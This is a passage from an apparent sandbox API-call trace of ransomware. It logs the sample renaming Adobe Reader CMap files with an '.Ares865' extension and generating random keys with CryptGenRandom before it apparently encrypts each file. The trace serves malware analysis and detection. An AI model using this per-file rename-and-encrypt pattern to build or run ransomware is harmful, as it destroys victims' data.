(lpString1="HC-HW-H", lpString2="Ares865") returned 1 [0162.311] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-HW-H.Ares865") returned 77 [0162.311] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-HW-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscms-uhc-hw-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-HW-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscms-uhc-hw-h.ares865"), dwFlags=0x1) returned 1 [0162.315] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-HW-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscms-uhc-hw-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.315] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16780) returned 1 [0162.315] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.316] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.316] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.319] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.320] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.320] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.320] lstrcpyW (in: lpString1=0x2cce46e, lpString2="KSCms-UHC-HW-V" | out: lpString1="KSCms-UHC-HW-V") returned="KSCms-UHC-HW-V" [0162.320] lstrlenW (lpString="KSCms-UHC-HW-V") returned 14 [0162.320] lstrlenW (lpString="Ares865") returned 7 [0162.320] lstrcmpiW (lpString1="HC-HW-V", lpString2="Ares865") returned 1 [0162.321] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-HW-V.Ares865") returned 77 [0162.321] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-HW-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscms-uhc-hw-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-HW-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscms-uhc-hw-v.ares865"), dwFlags=0x1) returned 1 [0162.325] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-HW-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscms-uhc-hw-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.325] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3211) returned 1 [0162.325] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.326] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.326] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.328] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.329] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.329] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.330] lstrcpyW (in: lpString1=0x2cce46e, lpString2="KSCms-UHC-UCS2" | out: lpString1="KSCms-UHC-UCS2") returned="KSCms-UHC-UCS2" [0162.330] lstrlenW (lpString="KSCms-UHC-UCS2") returned 14 [0162.330] lstrlenW (lpString="Ares865") returned 7 [0162.330] lstrcmpiW (lpString1="HC-UCS2", lpString2="Ares865") returned 1 [0162.330] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-UCS2.Ares865") returned 77 [0162.330] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscms-uhc-ucs2"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-UCS2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscms-uhc-ucs2.ares865"), dwFlags=0x1) returned 1 [0162.335] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-UCS2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscms-uhc-ucs2.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.335] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=189847) returned 1 [0162.335] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.336] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.336] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.349] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.350] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.350] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.353] lstrcpyW (in: lpString1=0x2cce46e, lpString2="KSCms-UHC-V" | out: lpString1="KSCms-UHC-V") returned="KSCms-UHC-V" [0162.353] lstrlenW (lpString="KSCms-UHC-V") returned 11 [0162.353] lstrlenW (lpString="Ares865") returned 7 [0162.353] lstrcmpiW (lpString1="s-UHC-V", lpString2="Ares865") returned 1 [0162.353] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-V.Ares865") returned 74 [0162.353] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscms-uhc-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscms-uhc-v.ares865"), dwFlags=0x1) returned 1 [0162.355] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscms-uhc-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.355] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3213) returned 1 [0162.355] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.356] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.356] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.358] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.359] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.359] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.359] lstrcpyW (in: lpString1=0x2cce46e, lpString2="KSCpc-EUC-H" | out: lpString1="KSCpc-EUC-H") returned="KSCpc-EUC-H" [0162.359] lstrlenW (lpString="KSCpc-EUC-H") returned 11 [0162.359] lstrlenW (lpString="Ares865") returned 7 [0162.359] lstrcmpiW (lpString1="c-EUC-H", lpString2="Ares865") returned 1 [0162.360] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCpc-EUC-H.Ares865") returned 74 [0162.360] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCpc-EUC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscpc-euc-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCpc-EUC-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscpc-euc-h.ares865"), dwFlags=0x1) returned 1 [0162.361] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCpc-EUC-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscpc-euc-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.361] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13232) returned 1 [0162.362] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.362] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.362] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.365] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.366] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.366] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.366] lstrcpyW (in: lpString1=0x2cce46e, lpString2="KSCpc-EUC-UCS2" | out: lpString1="KSCpc-EUC-UCS2") returned="KSCpc-EUC-UCS2" [0162.366] lstrlenW (lpString="KSCpc-EUC-UCS2") returned 14 [0162.366] lstrlenW (lpString="Ares865") returned 7 [0162.366] lstrcmpiW (lpString1="UC-UCS2", lpString2="Ares865") returned 1 [0162.367] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCpc-EUC-UCS2.Ares865") returned 77 [0162.367] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCpc-EUC-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscpc-euc-ucs2"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCpc-EUC-UCS2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscpc-euc-ucs2.ares865"), dwFlags=0x1) returned 1 [0162.368] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCpc-EUC-UCS2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscpc-euc-ucs2.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.368] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16328) returned 1 [0162.369] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.369] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.369] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.372] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.373] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.373] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.373] lstrcpyW (in: lpString1=0x2cce46e, lpString2="KSCpc-EUC-UCS2C" | out: lpString1="KSCpc-EUC-UCS2C") returned="KSCpc-EUC-UCS2C" [0162.373] lstrlenW (lpString="KSCpc-EUC-UCS2C") returned 15 [0162.373] lstrlenW (lpString="Ares865") returned 7 [0162.374] lstrcmpiW (lpString1="C-UCS2C", lpString2="Ares865") returned 1 [0162.374] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCpc-EUC-UCS2C.Ares865") returned 78 [0162.374] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCpc-EUC-UCS2C" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscpc-euc-ucs2c"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCpc-EUC-UCS2C.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscpc-euc-ucs2c.ares865"), dwFlags=0x1) returned 1 [0162.376] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCpc-EUC-UCS2C.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscpc-euc-ucs2c.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.376] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=156825) returned 1 [0162.376] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.377] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.377] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.407] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.408] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.408] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.411] lstrcpyW (in: lpString1=0x2cce46e, lpString2="UCS2-90ms-RKSJ" | out: lpString1="UCS2-90ms-RKSJ") returned="UCS2-90ms-RKSJ" [0162.411] lstrlenW (lpString="UCS2-90ms-RKSJ") returned 14 [0162.411] lstrlenW (lpString="Ares865") returned 7 [0162.411] lstrcmpiW (lpString1="ms-RKSJ", lpString2="Ares865") returned 1 [0162.411] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-90ms-RKSJ.Ares865") returned 77 [0162.411] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-90ms-RKSJ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-90ms-rksj"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-90ms-RKSJ.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-90ms-rksj.ares865"), dwFlags=0x1) returned 1 [0162.414] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-90ms-RKSJ.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-90ms-rksj.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.414] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=155399) returned 1 [0162.414] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.415] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.415] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.426] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.427] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.427] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.429] lstrcpyW (in: lpString1=0x2cce46e, lpString2="UCS2-90pv-RKSJ" | out: lpString1="UCS2-90pv-RKSJ") returned="UCS2-90pv-RKSJ" [0162.429] lstrlenW (lpString="UCS2-90pv-RKSJ") returned 14 [0162.429] lstrlenW (lpString="Ares865") returned 7 [0162.429] lstrcmpiW (lpString1="pv-RKSJ", lpString2="Ares865") returned 1 [0162.429] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-90pv-RKSJ.Ares865") returned 77 [0162.429] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-90pv-RKSJ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-90pv-rksj"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-90pv-RKSJ.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-90pv-rksj.ares865"), dwFlags=0x1) returned 1 [0162.431] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-90pv-RKSJ.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-90pv-rksj.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.431] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=148339) returned 1 [0162.432] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.432] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.432] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.446] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.447] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.447] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.449] lstrcpyW (in: lpString1=0x2cce46e, lpString2="UCS2-B5pc" | out: lpString1="UCS2-B5pc") returned="UCS2-B5pc" [0162.449] lstrlenW (lpString="UCS2-B5pc") returned 9 [0162.449] lstrlenW (lpString="Ares865") returned 7 [0162.449] lstrcmpiW (lpString1="S2-B5pc", lpString2="Ares865") returned 1 [0162.450] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-B5pc.Ares865") returned 72 [0162.450] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-B5pc" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-b5pc"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-B5pc.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-b5pc.ares865"), dwFlags=0x1) returned 1 [0162.451] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-B5pc.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-b5pc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.452] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=284931) returned 1 [0162.452] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.453] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.453] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.474] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.475] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.475] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.479] lstrcpyW (in: lpString1=0x2cce46e, lpString2="UCS2-ETen-B5" | out: lpString1="UCS2-ETen-B5") returned="UCS2-ETen-B5" [0162.479] lstrlenW (lpString="UCS2-ETen-B5") returned 12 [0162.479] lstrlenW (lpString="Ares865") returned 7 [0162.479] lstrcmpiW (lpString1="ETen-B5", lpString2="Ares865") returned 1 [0162.480] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-ETen-B5.Ares865") returned 75 [0162.480] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-ETen-B5" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-eten-b5"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-ETen-B5.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-eten-b5.ares865"), dwFlags=0x1) returned 1 [0162.482] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-ETen-B5.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-eten-b5.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.482] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=299283) returned 1 [0162.482] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.483] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.483] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.504] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.505] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.505] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.510] lstrcpyW (in: lpString1=0x2cce46e, lpString2="UCS2-GBK-EUC" | out: lpString1="UCS2-GBK-EUC") returned="UCS2-GBK-EUC" [0162.510] lstrlenW (lpString="UCS2-GBK-EUC") returned 12 [0162.510] lstrlenW (lpString="Ares865") returned 7 [0162.510] lstrcmpiW (lpString1="GBK-EUC", lpString2="Ares865") returned 1 [0162.510] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-GBK-EUC.Ares865") returned 75 [0162.510] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-GBK-EUC" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-gbk-euc"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-GBK-EUC.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-gbk-euc.ares865"), dwFlags=0x1) returned 1 [0162.512] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-GBK-EUC.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-gbk-euc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.512] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=243835) returned 1 [0162.512] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | 